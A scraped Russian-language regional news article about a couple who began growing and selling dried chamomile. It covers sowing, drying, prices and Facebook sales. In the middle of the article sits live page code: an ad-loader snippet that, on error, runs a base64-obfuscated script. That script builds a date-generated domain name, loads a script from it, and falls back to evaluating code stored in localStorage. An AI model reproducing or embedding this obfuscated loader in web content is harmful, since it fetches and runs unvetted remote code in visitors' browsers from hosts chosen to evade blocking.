Семейная пара из села Преображенка Ореховского района рискнула открыть специфический бизнес и не пожалела об этом.
Александр и Елена обычно занимались тем, что выращивали животных на убой и для переработки: держали собственный магазин мясных продуктов. Не так давно они решились на эксперимент и засеяли полтора гектара поля ромашкой, чтобы продавать как лекарственные травы.
Растение принялось. Теперь ромашку собирают вручную и поддают естественной сушке ради конечного продукта — головки (используется для изготовления лекарств и чаев). Для этого процесса (сушки) они используют чердак.
Известно, что средняя рыночная стоимость сушеных головок ромашки составляет 130 грн. / кг.
Удавалось продавать ромашку как по 110 грн / кг, так и по 150 грн / кг, — рассказывает Елена Кичкина. — Отсылаем «Новой Почтой» от 10, 20, 60 кг. А если очень просят, продаем и 100 гр. и 0,5 кг. Продажи делаем через Интернет, предлагаем ромашку в группах, где продаются лекарственные травы, в основном это группы в Facebook. Заказывают ромашку как частные лица, так и производители травяных чаев.
Ромашка — неприхотливая культура для выращивания, это облегчает процесс производства. Главное — угадать с временем посева. Семена высыпают на землю поверху в безветренную погоду после того, как каток обкатывает почту. После засева процедура с катком повторяется. (adsbygoogle = window.adsbygoogle || []).push({}); var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Люди, которые пытались этим заниматься, рассказывали, что, когда они сеяли ромашку в ветреную погоду, весь урожай был в посадке, а поле осталось чистым. Мы услышали, что нельзя сажать по ветру, ожидали тихой погоды — делится своим опытом Елена Кичкина. — Оказалось, ромашку можно высеивать в несколько этапов. Мы под зиму высеяли, сошла, как озимая пшеница. Но были большие выпады, полполя есть, полполя нет. Думали, что семена плохие, а оказалось, что нужен было полив. Ждали, чтобы пошел дождик, чтобы ромашка сошла. А при посеве весной, после дождя она вообще вся поднялась, и мы получили равномерные ростки, одним словом, красавица!
Так как это первый, тестовый, год выращивания, производители пока заинтересованы в получении большего опыта выращивания и пока не фокусируются на упаковке. В планах Кичкиных также выращивать другие травы и производить травяные чаи.
Упаковкой пока еще не занимались. Если выходить на магазины, еколавкы, ромашку нужно расфасовать, упаковать, разработать этикетку. Это немного больше расходов, а на первый пробный год, мы хотели понять, «приживется» у нас ромашка вообще. «Прижилась»! — радуется Елена
По материалам: UHBDP (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/biznes-na-romashkah-istoriya-uspeha-semejnoj-pary-iz-zaporozhskoj-oblasti-foto/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook